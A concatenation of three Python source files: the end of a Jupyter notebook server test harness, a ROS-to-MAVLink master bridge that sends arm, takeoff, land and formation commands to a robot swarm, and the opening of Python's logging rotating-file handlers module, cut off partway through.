for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def setup_class(cls):
cls.home_dir = TemporaryDirectory()
data_dir = TemporaryDirectory()
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir.name,
'IPYTHONDIR': pjoin(cls.home_dir.name, '.ipython'),
'JUPYTER_DATA_DIR' : data_dir.name
})
cls.env_patch.start()
cls.path_patch = patch.object(jupyter_core.paths, 'SYSTEM_JUPYTER_PATH', [])
cls.path_patch.start()
cls.config_dir = TemporaryDirectory()
cls.data_dir = data_dir
cls.runtime_dir = TemporaryDirectory()
cls.notebook_dir = TemporaryDirectory()
started = Event()
def start_thread():
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir.name,
data_dir=cls.data_dir.name,
runtime_dir=cls.runtime_dir.name,
notebook_dir=cls.notebook_dir.name,
base_url=cls.url_prefix,
config=cls.config,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.home_dir.cleanup()
cls.config_dir.cleanup()
cls.data_dir.cleanup()
cls.runtime_dir.cleanup()
cls.notebook_dir.cleanup()
cls.env_patch.stop()
cls.path_patch.stop()
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
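# Hedged usage sketch inside a NotebookTestBase subclass (the URL path is
# illustrative):
#
#   with assert_http_error(404):
#       r = requests.get(self.base_url() + 'api/contents/no-such-file')
#       r.raise_for_status()   # raises requests.HTTPError, caught above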
|
master_mavlink_bridge.py
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Empty, Int32, Float32
from geometry_msgs.msg import Point
from formation.msg import RobotFormationState, FormationPositions, RobotTarget
import pymavlink.mavutil as mavutil
from threading import Thread
from time import sleep
class MasterBridge():
def __init__(self):
self.DEBUG = rospy.get_param("DEBUG", False)
self.ENABLE_MASTER_GCS = rospy.get_param("USE_MASTER_AS_GCS", False)
# If True, connection will be over serial, otherwise will be over UDP
self.USE_SERIAL = rospy.get_param("USE_SERIAL", False)
self.n = rospy.get_param("nRobots", 5)
if self.DEBUG:
rospy.logwarn("[Master]: Got number of robots = %s", self.n)
self.master_sys_id = rospy.get_param("master_sys_id", 255)
if self.DEBUG:
rospy.logwarn("Master MAVLink ID = %s", self.master_sys_id)
# pymavlink connection
self.master_udp = rospy.get_param("master_udp", "127.0.0.1:30000")
self.master_serial = rospy.get_param("master_serial", "/dev/ttyUSB0")
self.serial_baud = rospy.get_param("serial_baud", 57600)
if self.USE_SERIAL:
self.mav = mavutil.mavlink_connection(self.master_serial, baud=self.serial_baud, source_system=self.master_sys_id)
            if self.DEBUG:
                rospy.logwarn("Master is connected on serial port %s at %s baud", self.master_serial, self.serial_baud)
else:
self.mav = mavutil.mavlink_connection("udpout:"+self.master_udp, source_system=self.master_sys_id)
if self.DEBUG:
rospy.logwarn("Master is connected on udpout:%s", self.master_udp)
self.ROBOT_STATE = 1
self.MASTER_CMD = 2
self.MASTER_CMD_ARM = 3
self.MASTER_CMD_TKO = 4
self.MASTER_CMD_LAND = 5
self.MASTER_CMD_POSCTL = 6
self.MASTER_CMD_HOLD = 7
self.MASTER_CMD_SHUTDOWN = 8
self.MASTER_CMD_REBOOT = 9
self.MASTER_CMD_SET_ORIGIN = 10
self.MASTER_CMD_SET_EAST = 11
self.MASTER_CMD_SET_nROBOTS = 12
self.MASTER_CMD_GO = 13
self.MASTER_CMD_GOAL = 14
self.MASTER_CMD_SET_TOALT = 15
self.MASTER_CMD_ACK = 16
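        # Wire convention used by this bridge for COMMAND_LONG / MAV_CMD_USER_1:
        #   param1 = message class (ROBOT_STATE or MASTER_CMD)
        #   param2 = sub-command (a MASTER_CMD_* code) or state payload
        #   param3..param7 = command-specific payload, zero when unused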
# CMD string
self.CMD_STRING = {3:'MASTER_CMD_ARM', 4:'MASTER_CMD_TKO', 5:'MASTER_CMD_LAND', 6:'MASTER_CMD_POSCTL', 7:'MASTER_CMD_HOLD', 8:'MASTER_CMD_SHUTDOWN', 9:'MASTER_CMD_REBOOT', 10:'MASTER_CMD_SET_ORIGIN', 11:'MASTER_CMD_SET_EAST', 12:'MASTER_CMD_SET_nROBOTS', 13:'MASTER_CMD_GO', 14:'MASTER_CMD_GOAL', 15:'MASTER_CMD_SET_TOALT'}
        # Topic names for robot locations in the locally defined ENU coordinates
self.r_loc_topic_names = []
rstr = "/robot"
for i in range(self.n):
self.r_loc_topic_names.append(rstr+str(i)+"/state")
# Subscribers
rospy.Subscriber('/arm_robot', Int32, self.armCb)
rospy.Subscriber('/disarm_robot', Int32, self.disarmCb)
rospy.Subscriber('/takeoff_robot', Int32, self.tkoCb)
rospy.Subscriber('/land_robot', Int32, self.landCb)
rospy.Subscriber('/hold_robot', Int32, self.holdCb)
rospy.Subscriber('/posctl_robot', Int32, self.posctlCb)
rospy.Subscriber('/shutdown_robot', Int32, self.shutdownCb)
rospy.Subscriber('/reboot_robot', Int32, self.rebootCb)
rospy.Subscriber('/formation', FormationPositions, self.formationCb)
rospy.Subscriber('/go', Empty, self.goCb)
rospy.Subscriber('/setnRobots', Int32, self.nRCb)
rospy.Subscriber('/setOrigin', Point, self.setOriginCb)
rospy.Subscriber('/setEast', Point, self.setEastCb)
rospy.Subscriber("/setTOALT", Float32, self.setTOALTCb)
# Publishers
self.robot_state_pub_list = []
for i in range(self.n):
self.robot_state_pub_list.append(rospy.Publisher(self.r_loc_topic_names[i], RobotFormationState, queue_size=1))
def send_heartbeat(self):
""" Sends heartbeat msg to all vehicles
"""
self.mav.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID, mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED, 0, mavutil.mavlink.MAV_STATE_UNINIT)
def recvCb(self):
# This callback will be running inside a Thread
while (True):
cmd = mavutil.mavlink.MAV_CMD_USER_1
msg = self.mav.recv_match(blocking=True)
            if msg is not None:
                cmd_type = msg.get_type()
                src_sys = msg.get_srcSystem()
                # Only COMMAND_LONG messages carry target_system; check the type
                # first to avoid an AttributeError on e.g. HEARTBEAT messages.
                if cmd_type == "COMMAND_LONG" and 0 < src_sys <= self.n and msg.command == cmd and msg.target_system == self.master_sys_id:
if msg.param1 == self.ROBOT_STATE:
if self.DEBUG:
rospy.logwarn("[Master]: Received ROBOT_STATE from Robot %s", src_sys-1)
state_msg = RobotFormationState()
state_msg.header.stamp = rospy.Time.now()
state_msg.received_goal = msg.param2
state_msg.mission_started = msg.param3
state_msg.arrived = msg.param4
state_msg.point.x = msg.param5
state_msg.point.y = msg.param6
state_msg.point.z = msg.param7
# publish msg to ROS
self.robot_state_pub_list[src_sys-1].publish(state_msg)
if msg.param1 == self.MASTER_CMD_ACK:
rospy.logwarn("[Master]: Got acknowledgment of %s from robot %s", self.CMD_STRING[msg.param2], src_sys-1)
else:
if self.DEBUG:
rospy.logwarn("Received unexpected MAVLink msg of type: %s from MAVLink ID = %s", msg.get_type(), msg.get_srcSystem())
# Should we sleep before we poll the udp again?
sleep(0.02)
##### Callbacks ###
def goCb(self, msg):
tgt_sys = 0 # to all
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_GO
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(tgt_sys, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: Sent MASTER_CMD_GO to all systems")
def formationCb(self, msg):
tgt_comp_id = 0
for i in range(self.n):
tgt_sys = i+1
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_GOAL
p3 = msg.goals[i].x
p4 = msg.goals[i].y
p5 = msg.goals[i].z
p6 = msg.tf
p7 = 0
self.mav.mav.command_long_send(tgt_sys, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: Sent formation goal to Robot %s", i)
sleep(0.01)
def nRCb(self, msg):
r_id = 0 # to all
nR = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_nROBOTS
p3 = nR # number of robots
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending number of robots = %s to all robots", nR)
def setOriginCb(self, msg):
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_ORIGIN
p3 = msg.x
p4 = msg.y
p5 = msg.z
p6, p7 = 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending Origin coordinates to all robots")
def setEastCb(self, msg):
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_EAST
p3 = msg.x
p4 = msg.y
p5 = msg.z
p6, p7 = 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending East coordinates to all robots")
def setTOALTCb(self, msg):
if msg is not None:
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_TOALT
p3 = msg.data
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending TOALT=%s to all robots", msg.data)
def armCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_ARM
p3 = 1 # 1: arm, 0: disarm
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_ARM to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_ARM to all robots")
def disarmCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_ARM
p3 = 0 # 1: arm, 0: disarm
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_DISARM to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_DISARM to all robots")
def tkoCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_TKO
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_TAKEOFF to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_TAKEOFF to all robots")
def landCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_LAND
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_LAND to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_LAND to all robots")
def holdCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_HOLD
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_HOLD to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_HOLD to all robots")
def posctlCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_POSCTL
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_POSCTL to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_POSCTL to all robots")
def shutdownCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SHUTDOWN
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_SHUTDOWN to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_SHUTDOWN to all robots")
def rebootCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_REBOOT
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_REBOOT to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_REBOOT to all robots")
def main():
rospy.init_node('master_mavlink_node', anonymous=True)
rospy.logwarn("Starting master_mavlink_node")
M = MasterBridge()
    # Run recvCb in a thread
recvthread = Thread(target=M.recvCb)
recvthread.daemon = True
recvthread.start()
# ROS loop frequency, Hz
rate = rospy.Rate(2.0)
while not rospy.is_shutdown():
if M.ENABLE_MASTER_GCS:
M.send_heartbeat()
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
if "b" not in mode:
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
# See bpo-45401: Never rollover anything other than regular files
if os.path.exists(self.baseFilename) and not os.path.isfile(self.baseFilename):
return False
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return True
return False
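# A minimal usage sketch (the file name is illustrative): rotate at roughly
# 1 MB, keeping three numbered backups next to the active "app.log".
#
#   handler = RotatingFileHandler("app.log", maxBytes=1_000_000, backupCount=3)
#   logging.getLogger("demo").addHandler(handler)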
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
                # Rotate time is before the current time (for example when
                # self.rolloverAt is 13:45 and it is now 14:15); rotation is
                # tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
# See bpo-45401: Never rollover anything other than regular files
if os.path.exists(self.baseFilename) and not os.path.isfile(self.baseFilename):
return False
t = int(time.time())
if t >= self.rolloverAt:
return True
return False
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
# See bpo-44753: Don't use the extension when computing the prefix.
prefix = os.path.splitext(baseName)[0] + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
# See bpo-45628: The date/time suffix could be anywhere in the
# filename
parts = suffix.split('.')
for part in parts:
if self.extMatch.match(part):
result.append(os.path.join(dirName, fileName))
break
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
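# A minimal usage sketch (the file name is illustrative): roll the log over at
# midnight and keep a week of dated backups such as "app.log.2016-01-01".
#
#   handler = TimedRotatingFileHandler("app.log", when="midnight", backupCount=7)
#   logging.getLogger("demo").addHandler(handler)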
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
if "b" not in mode:
encoding = io.text_encoding(encoding)
